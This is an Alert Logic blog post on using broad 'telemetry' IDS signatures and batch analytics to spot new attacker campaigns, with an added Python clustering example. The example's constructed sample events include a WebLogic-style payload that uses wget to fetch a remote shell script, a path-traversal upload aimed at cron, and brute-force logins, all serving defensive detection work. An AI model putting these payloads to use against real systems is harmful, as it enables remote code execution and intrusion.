Intelligence-Driven Threat Detection

The principal goal of threat intelligence within Alert Logic is to identify new attacker activity so that detection coverage can be built for it. This data can be acquired externally (the public internet) or internally (our own log and network data). Sourcing information solely from external sources (CVEs and the like) gives no indication that attackers are actually using those methods. By pivoting on internally sourced network data, our experts can concentrate on the current, live activities of attackers, which provides the maximum value and protection for customers right now.

To support this ability in our Network IDS, we at Alert Logic release specialized signatures called “telemetry signatures”. Firings of these signatures, together with their payload data, are post-processed in an intelligence-driven batch analytics framework to find the attacking “needles” in the network “haystack”. Coverage released by the team is therefore tightly tied to current and evolving attacker behavior, allowing us to walk in the attacker’s shadow.

Modern Signature Detection

A traditional IDS is fed with signatures. A signature in this context is simply a rule that selects the portion of the full network traffic you consider potentially malicious. Signatures can be very specific or very general. Specific signatures help identify exact, targeted threats. General signatures gather large volumes of network data for analytics, data science and anomaly detection. At Alert Logic we employ both types:

  • It is entirely possible to capture previously unknown attacks with General IDS signatures (we did this with CVE-2019-2725)
  • It is entirely possible to identify data breaches with General IDS signatures
  • It is entirely possible to definitively identify that you have been breached using specific signatures

Alert Logic researchers call these general signatures “telemetry”. Automation and data science-backed tooling allows value to be extracted rapidly and at scale from large troves of IDS network data, and that is how we extract value from telemetry signatures.
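To make the post-processing concrete, here is an added example (not Alert Logic's tooling, and not code from the original page) of the kind of batch analytics that can sit behind telemetry signatures. Firings of one broad HTTP POST rule are normalised so that per-victim variation (IP addresses, form values, numeric IDs) collapses, clustered by the normalised payload, compared against the patterns already seen in a previous batch, and ranked by how many customers and sources each new pattern touches. The event records, signature name, customer names, IP addresses and payloads are all constructed; the WebLogic-style path appears only because the page mentions CVE-2019-2725 and does not reflect any real traffic.

```python
# Added example (not Alert Logic's tooling): batch post-processing of firings
# from a broad "telemetry" IDS rule to find new, widely sprayed payloads.
import re
from collections import defaultdict

# Constructed payload prefix shared by one campaign: only the callback URL
# differs between the two variants seen below.
WLS_PREFIX = ('POST /wls-wsat/CoordinatorPortType11 <java><void class="java.lang.ProcessBuilder">'
              '<array><string>wget</string><string>')

# Constructed firings: (timestamp, signature, source IP, customer, payload).
# All addresses are documentation/benchmark ranges; nothing here is real traffic.
EVENTS = [
    ("2019-04-22T01:02:03Z", "TELEMETRY_HTTP_POST", "198.51.100.7", "cust-a",
     WLS_PREFIX + "http://203.0.113.5:8080/x1.sh</string>"),
    ("2019-04-22T01:02:09Z", "TELEMETRY_HTTP_POST", "198.51.100.7", "cust-b",
     WLS_PREFIX + "http://203.0.113.5:8080/x1.sh</string>"),
    ("2019-04-22T01:03:41Z", "TELEMETRY_HTTP_POST", "198.51.100.9", "cust-c",
     WLS_PREFIX + "http://198.18.0.77:9001/x2.sh</string>"),
    ("2019-04-22T01:05:00Z", "TELEMETRY_HTTP_POST", "198.51.100.9", "cust-d",
     WLS_PREFIX + "http://198.18.0.77:9001/x2.sh</string>"),
    # Background noise that earlier batches have already seen.
    ("2019-04-22T01:06:10Z", "TELEMETRY_HTTP_POST", "192.0.2.33", "cust-a",
     "POST /phpmyadmin/index.php pma_username=root&pma_password=123456"),
    ("2019-04-22T01:06:12Z", "TELEMETRY_HTTP_POST", "192.0.2.33", "cust-b",
     "POST /phpmyadmin/index.php pma_username=root&pma_password=admin1"),
    ("2019-04-22T01:06:15Z", "TELEMETRY_HTTP_POST", "192.0.2.34", "cust-c",
     "POST /phpmyadmin/index.php pma_username=root&pma_password=toor99"),
    # A one-off against a single customer: worth a look, but not spray and pray.
    ("2019-04-22T01:09:30Z", "TELEMETRY_HTTP_POST", "192.0.2.80", "cust-a",
     "POST /api/v2/upload filename=../../../../etc/cron.d/job7"),
]

# Order matters: IPs and form values are collapsed before bare numbers.
_NORMALISE = [
    (re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b"), "<ip>"),
    (re.compile(r"=[\w./%+-]+"), "=<v>"),
    (re.compile(r"\d+"), "<n>"),
]


def pattern_key(payload):
    """Collapse per-victim variation so variants of one campaign share a key."""
    for rx, token in _NORMALISE:
        payload = rx.sub(token, payload)
    return payload


# Pattern keys already known from the previous batch (constructed).
BASELINE = {pattern_key("POST /phpmyadmin/index.php pma_username=root&pma_password=secret")}


def cluster(events):
    """Group firings by normalised payload, tracking spread over sources and customers."""
    clusters = defaultdict(lambda: {"count": 0, "sources": set(),
                                    "customers": set(), "payloads": []})
    for _ts, _sig, src, cust, payload in events:
        c = clusters[pattern_key(payload)]
        c["count"] += 1
        c["sources"].add(src)
        c["customers"].add(cust)
        c["payloads"].append(payload)
    return clusters


def longest_common_substring(strings):
    """Longest literal present in every payload: a candidate content match."""
    first, rest, best = strings[0], strings[1:], ""
    for i in range(len(first)):
        # Only try candidates longer than the best found so far.
        for j in range(len(first), i + len(best), -1):
            cand = first[i:j]
            if all(cand in s for s in rest):
                best = cand
                break
    return best


def find_needles(events, baseline, min_customers=3):
    """New clusters (absent from baseline) touching >= min_customers, widest first."""
    needles = []
    for key, c in cluster(events).items():
        if key in baseline or len(c["customers"]) < min_customers:
            continue
        needles.append({
            "pattern": key,
            "customers": len(c["customers"]),
            "sources": len(c["sources"]),
            "count": c["count"],
            "anchor": longest_common_substring(c["payloads"]),
        })
    needles.sort(key=lambda n: (-n["customers"], -n["sources"], -n["count"]))
    return needles


if __name__ == "__main__":
    for n in find_needles(EVENTS, BASELINE):
        print(f'{n["customers"]} customers / {n["sources"]} sources: {n["pattern"]}')
        print(f'  suggested content match: {n["anchor"]!r}')
```

On the constructed data only the sprayed WebLogic-style pattern survives: the phpMyAdmin brute force is already in the baseline and the single-customer upload attempt falls under the customer threshold. The `anchor` field is the longest literal shared by every payload in the cluster, which is a natural starting point for the content match of a specific signature; a production pipeline would additionally apply time windows and per-customer baselines, and would check that the anchor is not something trivially common before promoting it to a rule.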

We generate over 2 billion IDS events across our customers every year, and that number increases by hundreds of millions every year. We make close to 80 new IDS data points every single second. This is a huge volume of data and drives a large component of our breach and threat detection today.

Public Data Sources

Common public data sources for information on attacker behavior include the National Vulnerability Database (NVD) and exploitdb. NVD hosts CVE (Common Vulnerabilities and Exposures) identifiers, used across the industry as a common language for talking about vulnerabilities. Exploitdb lists exploits, posted by contributors, for a large range of technologies, and can be a valuable source of information about newly available exploits. This is different from NVD, which lists vulnerabilities. Just because a vulnerability exists does not mean that an exploit exists or is even possible. As a result, CVEs are the better reference for security controls like vulnerability scanners, while exploitdb is the better reference for intrusion detection.

Exploitdb has over 47,000 exploits listed as of this writing, and NVD lists over 115,000 vulnerabilities, with tens of thousands of new entries added every year. The volume of new vulnerabilities and exploits in both sources is growing faster every year. If we assume it takes one hour to build threat detection for each item on NVD or exploitdb, then one security expert working alone, 8 hours a day, 5 days a week (40 hours per week) would need:

  • 1,175 weeks to cover the backlog of exploitdb (over 22 years)
  • 2,875 weeks to cover the backlog of NVD (over 55 years)

And this does not consider the additional staffing needed to maintain parity or allow for variations in complexity. Note too, that we are only considering two public sources here, when there are dozens of sources available which would be in scope to analyze.

At Alert Logic we dedicate a portion of our resources to providing coverage for threats from these public sources. Our history of analyzing these threats has given us reliable selection criteria for which vulnerabilities and exploits are likely to be targeted by attackers; even so, fewer than 10 percent of the exploits we cover are actively in use by attackers against our customers at any one time. At that rate of return, based on the numbers above, one could spend 20 years' worth of man-hours building protection for all of exploitdb to extract about 2 years' worth of attacker coverage value.

Threat-Centered Approach

Threat is a term used loosely in the media and the security industry to mean many different things, but it has a specific formal meaning: a threat is one component of overall risk.

Risk is calculated as the product of three factors: Risk = Asset × Vulnerability × Threat. The factors multiply rather than add, so if any one of them is absent there is no risk.

This means that the risk to a business of a compromise or security incident is dependent on:

  • The presence of the asset which is to be attacked
  • A vulnerability on the asset which can be exploited
  • The threat that an internal or external actor would exploit the weakness

If you remove any one of these three factors, the risk to an organization drops dramatically. As a result, for a risk to be real and practically actionable for a business, a threat must exist. Threats are created by malicious actors who aim to exploit vulnerabilities on assets. Put more simply: if no one is attacking you, no one can breach you.

With this in mind, our team at Alert Logic is laser-focused on the threats actors are posing against our customers right now. The most direct route to identifying those threats is to look in customer log and network data and use what we find there to drive new coverage and research work. The result is that customers get the coverage they need, tailored to their actual threat exposure.

Better Together

As indicated in Alert Logic’s 2018 Critical Watch Report, “spray and pray” is the predominant attack type across the internet—with the attack chain being compressed such that reconnaissance is becoming a dying art. Due to the scale of the customer data at our disposal in this approach, we are able to convert what might otherwise be considered a reactive coverage approach into a proactive coverage approach. This is based on the extensively observed behavior that the vast majority of attacks being perpetrated across the internet are not successful. Let’s describe how this can be done with an analogy.

Consider that we lay out the entire IP space of all Alert Logic customers end to end, and an attacker begins a new attack against these customers, starting at the left-hand side and moving right.

In this scenario there are several milestones, indicated by colored lines in the diagram:

  • Red: Identification of the new attack, as close as possible to the starting point (the left-hand side)
  • Green: Time to release coverage for this specific threat
  • Blue: First possible instance of a host vulnerable to this new attack

Our goal as an intelligence-driven organization is to identify the presence of the attack as early as possible, so that the interval between the first orange line and the red line is as short as possible. Our next goal is to release coverage as quickly as possible, shrinking the interval between the red and green lines. The more you can shrink those intervals, the more effective you will be in rapidly providing coverage. Consider too that the entire length of these chains might be measured in hours or days.

If we can release coverage quickly, detection is in place before the attack reaches a customer who is potentially susceptible to the vulnerability. This is shown in the image below by the transparent orange box: that set of customers now has threat detection in place as a consequence of proactive analysis of the latest attacker threats.

In this way, customers gain better protection as a single unit than they could as individual security organizations, and they all benefit from the increased attack surface visibility. To draw a direct parallel in the analogy, consider the image below. The landscape at the top is Alert Logic; the much-reduced visibility scope below is an individual customer. The individual customer must react much more quickly, with much less notice and greatly reduced data.

This approach is completely agnostic to any public source reporting. It is irrelevant to this process, just as it is irrelevant to attackers, whether exploit code is available in the public domain or listed on a formal information security site such as NVD or exploitdb. Customers get the coverage they need, for the most dangerous threats they experience.

An organization can theoretically implement and manage a similar process on their own. It can be expensive and resource-intensive, though, and—as illustrated above—result in reduced visibility and inadequate reaction time. Alert Logic works with over 4,000 customers around the world and we have the platform, intelligence, and experts to apply intelligence-driven threat detection at scale to proactively identify and defend against threats. We provide cost-effective protection, and we deliver better peace of mind than what organizations can achieve attempting this on their own.